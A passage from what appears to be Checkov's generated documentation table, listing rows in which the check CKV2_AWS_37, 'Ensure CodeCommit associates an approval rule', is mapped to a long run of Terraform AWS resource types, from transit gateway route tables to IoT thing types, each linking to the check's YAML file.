[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1087 | CKV2_AWS_37 | resource | aws_ec2_transit_gateway_route_table | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1088 | CKV2_AWS_37 | resource | aws_ec2_transit_gateway_route_table_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1089 | CKV2_AWS_37 | resource | aws_ec2_transit_gateway_route_table_propagation | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1090 | CKV2_AWS_37 | resource | aws_ec2_transit_gateway_vpc_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1091 | CKV2_AWS_37 | resource | aws_ec2_transit_gateway_vpc_attachment_accepter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1092 | CKV2_AWS_37 | resource | aws_ecr_lifecycle_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1093 | CKV2_AWS_37 | resource | aws_ecr_repository | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1094 | CKV2_AWS_37 | resource | aws_ecr_repository_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1095 | CKV2_AWS_37 | resource | aws_ecs_capacity_provider | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1096 | CKV2_AWS_37 | resource | aws_ecs_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1097 | CKV2_AWS_37 | resource | aws_ecs_service | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1098 | CKV2_AWS_37 | resource | aws_ecs_task_definition | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1099 | CKV2_AWS_37 | resource | aws_efs_access_point | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1100 | CKV2_AWS_37 | resource | aws_efs_file_system | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1101 | CKV2_AWS_37 | resource | aws_efs_file_system_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1102 | CKV2_AWS_37 | resource | aws_efs_mount_target | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1103 | CKV2_AWS_37 | resource | aws_egress_only_internet_gateway | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1104 | CKV2_AWS_37 | resource | aws_eip | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1105 | CKV2_AWS_37 | resource | aws_eip_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1106 | CKV2_AWS_37 | resource | aws_eks_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1107 | CKV2_AWS_37 | resource | aws_eks_fargate_profile | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1108 | CKV2_AWS_37 | resource | aws_eks_node_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1109 | CKV2_AWS_37 | resource | aws_elastic_beanstalk_application | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1110 | CKV2_AWS_37 | resource | aws_elastic_beanstalk_application_version | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1111 | CKV2_AWS_37 | resource | aws_elastic_beanstalk_configuration_template | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1112 | CKV2_AWS_37 | resource | aws_elastic_beanstalk_environment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1113 | CKV2_AWS_37 | resource | aws_elasticache_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1114 | CKV2_AWS_37 | resource | aws_elasticache_parameter_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1115 | CKV2_AWS_37 | resource | aws_elasticache_replication_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1116 | CKV2_AWS_37 | resource | aws_elasticache_security_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1117 | CKV2_AWS_37 | resource | aws_elasticache_subnet_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1118 | CKV2_AWS_37 | resource | aws_elasticsearch_domain | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1119 | CKV2_AWS_37 | resource | aws_elasticsearch_domain_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1120 | CKV2_AWS_37 | resource | aws_elastictranscoder_pipeline | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1121 | CKV2_AWS_37 | resource | aws_elastictranscoder_preset | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1122 | CKV2_AWS_37 | resource | aws_elb | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1123 | CKV2_AWS_37 | resource | aws_elb_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1124 | CKV2_AWS_37 | resource | aws_emr_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1125 | CKV2_AWS_37 | resource | aws_emr_instance_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1126 | CKV2_AWS_37 | resource | aws_emr_security_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1127 | CKV2_AWS_37 | resource | aws_flow_log | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1128 | CKV2_AWS_37 | resource | aws_fms_admin_account | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1129 | CKV2_AWS_37 | resource | aws_fsx_lustre_file_system | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1130 | CKV2_AWS_37 | resource | aws_fsx_windows_file_system | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1131 | CKV2_AWS_37 | resource | aws_gamelift_alias | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1132 | CKV2_AWS_37 | resource | aws_gamelift_build | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1133 | CKV2_AWS_37 | resource | aws_gamelift_fleet | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1134 | CKV2_AWS_37 | resource | aws_gamelift_game_session_queue | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1135 | CKV2_AWS_37 | resource | aws_glacier_vault | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1136 | CKV2_AWS_37 | resource | aws_glacier_vault_lock | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1137 | CKV2_AWS_37 | resource | aws_globalaccelerator_accelerator | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1138 | CKV2_AWS_37 | resource | aws_globalaccelerator_endpoint_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1139 | CKV2_AWS_37 | resource | aws_globalaccelerator_listener | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1140 | CKV2_AWS_37 | resource | aws_glue_catalog_database | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1141 | CKV2_AWS_37 | resource | aws_glue_catalog_table | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1142 | CKV2_AWS_37 | resource | aws_glue_classifier | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1143 | CKV2_AWS_37 | resource | aws_glue_connection | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1144 | CKV2_AWS_37 | resource | aws_glue_crawler | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1145 | CKV2_AWS_37 | resource | aws_glue_job | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1146 | CKV2_AWS_37 | resource | aws_glue_security_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1147 | CKV2_AWS_37 | resource | aws_glue_trigger | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1148 | CKV2_AWS_37 | resource | aws_glue_workflow | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1149 | CKV2_AWS_37 | resource | aws_guardduty_detector | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1150 | CKV2_AWS_37 | resource | aws_guardduty_invite_accepter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1151 | CKV2_AWS_37 | resource | aws_guardduty_ipset | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1152 | CKV2_AWS_37 | resource | aws_guardduty_member | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1153 | CKV2_AWS_37 | resource | aws_guardduty_organization_admin_account | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1154 | CKV2_AWS_37 | resource | aws_guardduty_organization_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1155 | CKV2_AWS_37 | resource | aws_guardduty_threatintelset | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1156 | CKV2_AWS_37 | resource | aws_iam_access_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1157 | CKV2_AWS_37 | resource | aws_iam_account_alias | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1158 | CKV2_AWS_37 | resource | aws_iam_account_password_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1159 | CKV2_AWS_37 | resource | aws_iam_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1160 | CKV2_AWS_37 | resource | aws_iam_group_membership | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1161 | CKV2_AWS_37 | resource | aws_iam_group_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1162 | CKV2_AWS_37 | resource | aws_iam_group_policy_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1163 | CKV2_AWS_37 | resource | aws_iam_instance_profile | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1164 | CKV2_AWS_37 | resource | aws_iam_openid_connect_provider | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1165 | CKV2_AWS_37 | resource | aws_iam_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1166 | CKV2_AWS_37 | resource | aws_iam_policy_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1167 | CKV2_AWS_37 | resource | aws_iam_policy_document | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1168 | CKV2_AWS_37 | resource | aws_iam_role | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1169 | CKV2_AWS_37 | resource | aws_iam_role_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1170 | CKV2_AWS_37 | resource | aws_iam_role_policy_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1171 | CKV2_AWS_37 | resource | aws_iam_saml_provider | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1172 | CKV2_AWS_37 | resource | aws_iam_server_certificate | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1173 | CKV2_AWS_37 | resource | aws_iam_service_linked_role | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1174 | CKV2_AWS_37 | resource | aws_iam_user | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1175 | CKV2_AWS_37 | resource | aws_iam_user_group_membership | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1176 | CKV2_AWS_37 | resource | aws_iam_user_login_profile | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1177 | CKV2_AWS_37 | resource | aws_iam_user_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1178 | CKV2_AWS_37 | resource | aws_iam_user_policy_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1179 | CKV2_AWS_37 | resource | aws_iam_user_ssh_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1180 | CKV2_AWS_37 | resource | aws_inspector_assessment_target | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1181 | CKV2_AWS_37 | resource | aws_inspector_assessment_template | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1182 | CKV2_AWS_37 | resource | aws_inspector_resource_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1183 | CKV2_AWS_37 | resource | aws_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1184 | CKV2_AWS_37 | resource | aws_internet_gateway | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1185 | CKV2_AWS_37 | resource | aws_iot_certificate | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1186 | CKV2_AWS_37 | resource | aws_iot_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1187 | CKV2_AWS_37 | resource | aws_iot_policy_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1188 | CKV2_AWS_37 | resource | aws_iot_role_alias | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1189 | CKV2_AWS_37 | resource | aws_iot_thing | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1190 | CKV2_AWS_37 | resource | aws_iot_thing_principal_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1191 | CKV2_AWS_37 | resource | aws_iot_thing_type | Ensure CodeCommit associates an approval rule | Terraform | 